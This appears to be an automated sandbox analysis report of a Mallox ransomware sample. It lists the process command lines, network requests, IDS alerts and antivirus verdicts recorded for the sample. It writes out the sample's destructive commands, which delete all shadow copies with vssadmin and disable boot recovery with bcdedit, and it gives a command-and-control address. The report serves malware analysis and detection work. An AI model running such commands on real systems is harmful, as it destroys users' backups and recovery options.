Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | June 1, 2024, 8:49 a.m. | June 1, 2024, 9 a.m. |
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
2692-
bcdedit.exe bcdedit /set {current} bootstatuspolicy ignoreallfailures
2752
-
-
-
bcdedit.exe bcdedit /set {current} recoveryenabled no
2860
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
api.ipify.org | 104.26.13.205 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.101:59002 -> 164.124.101.2:53 | 2047702 | ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup | Misc activity |
UDP 192.168.56.101:59002 -> 8.8.8.8:53 | 2047702 | ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup | Misc activity |
TCP 91.215.85.135:80 -> 192.168.56.101:49172 | 2400013 | ET DROP Spamhaus DROP Listed Traffic Inbound group 14 | Misc Attack |
TCP 192.168.56.101:49171 -> 104.26.13.205:80 | 2021997 | ET POLICY External IP Lookup api.ipify.org | Device Retrieving External IP Address Detected |
TCP 192.168.56.101:49172 -> 91.215.85.135:80 | 2039815 | ET MALWARE Win32/Filecoder.OJC CnC Checkin | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
file | C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\libegl.dll |
file | C:\Program Files\Mozilla Firefox\browser\features\formautofill@mozilla.org.xpi |
section | _RDATA |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://api.ipify.org/ | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://91.215.85.135/QWEwqdsvsf/ap.php |
request | GET http://api.ipify.org/ |
request | POST http://91.215.85.135/QWEwqdsvsf/ap.php |
request | POST http://91.215.85.135/QWEwqdsvsf/ap.php |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOCK |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\metadata |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\index-dir |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Origin Bound Certs |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\reports\8dc74f67-39b6-4058-9ac1-6f782fcd0d62.dmp |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Shortcuts |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Last Session |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache\index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\index.txt |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Favicons |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\History |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\52eca80efb7ea8c5_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
domain | api.ipify.org |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk |
cmdline | bcdedit /set {current} bootstatuspolicy ignoreallfailures |
cmdline | cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures |
cmdline | cmd.exe /c bcdedit /set {current} recoveryenabled no |
cmdline | bcdedit /set {current} recoveryenabled no |
cmdline | "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures |
cmdline | "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no |
host | 91.215.85.135 |
file | \Device\HarddiskVolume1\Boot\BOOTSTAT.DAT |
command | "c:\windows\system32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures |
command | "c:\windows\system32\cmd.exe" /c bcdedit /set {current} recoveryenabled no |
command | bcdedit /set {current} bootstatuspolicy ignoreallfailures |
command | bcdedit /set {current} recoveryenabled no |
cmdline | bcdedit /set {current} bootstatuspolicy ignoreallfailures |
cmdline | bcdedit /set {current} recoveryenabled no |
cmdline | C:\Windows\sysnative\vssadmin.exe delete shadows /all /quiet |
Bkav | W32.Common.AB1E3033 |
Lionic | Trojan.Win32.Mallox.j!c |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 100) |
CAT-QuickHeal | Ransom.Mallox.S33100643 |
Skyhigh | BehavesLike.Win64.NetLoader.gh |
ALYac | Trojan.Ransom.Filecoder |
Cylance | Unsafe |
VIPRE | Gen:Variant.Lazy.436214 |
Sangfor | Ransom.Win32.Behaviour.swkaa |
K7AntiVirus | Trojan ( 005aa3791 ) |
BitDefender | Gen:Variant.Lazy.436214 |
K7GW | Trojan ( 005aa3791 ) |
Cybereason | malicious.21da18 |
Arcabit | Trojan.Lazy.D6A7F6 |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of Win64/Filecoder.Mallox.A |
APEX | Malicious |
McAfee | Artemis!71EFE7A21DA1 |
Avast | Win64:RansomX-gen [Ransom] |
ClamAV | Win.Ransomware.Mallox-10030404-0 |
Kaspersky | HEUR:Trojan-Ransom.Win32.Generic |
Alibaba | Ransom:Win64/Mallox.c8e74f9e |
NANO-Antivirus | Trojan.Win64.Encoder.knhmof |
MicroWorld-eScan | Gen:Variant.Lazy.436214 |
Rising | Ransom.OutSider!1.D74B (CLASSIC) |
Emsisoft | Gen:Variant.Lazy.436214 (B) |
F-Secure | Heuristic.HEUR/AGEN.1372165 |
DrWeb | Trojan.Encoder.38731 |
Zillya | Trojan.Filecoder.Win64.114260 |
McAfeeD | ti!45A236E7AA80 |
Trapmine | suspicious.low.ml.score |
FireEye | Generic.mg.71efe7a21da183c4 |
Sophos | Troj/Mallox-B |
Ikarus | Trojan-Ransom.Mallox |
Jiangmin | Trojan.Generic.hsdeh |
Detected | |
Avira | HEUR/AGEN.1372165 |
Antiy-AVL | Trojan/Win32.Agent |
Kingsoft | Win32.Trojan-Ransom.Generic.a |
Gridinsoft | Ransom.Win64.AI.sa |
Microsoft | Ransom:Win64/Mallox.CCCM!MTB |
ViRobot | Trojan.Win.Z.Mallox.489984.G |
ZoneAlarm | HEUR:Trojan-Ransom.Win32.Generic |
GData | Gen:Variant.Lazy.436214 |
Varist | W64/ABRisk.EOOZ-6139 |
AhnLab-V3 | Ransomware/Win.Mallox.R648404 |
TACHYON | Ransom/W64.Agent.489984 |
DeepInstinct | MALICIOUS |
VBA32 | Trojan.Encoder |
dead_host | 192.168.56.1:139 |
dead_host | 192.168.56.1:445 |
dead_host | 192.168.56.1:135 |
dead_host | 192.168.56.101:49169 |
dead_host | 192.168.56.101:49166 |
dead_host | 192.168.56.101:49168 |
dead_host | 192.168.56.101:49175 |
dead_host | 192.168.56.101:49173 |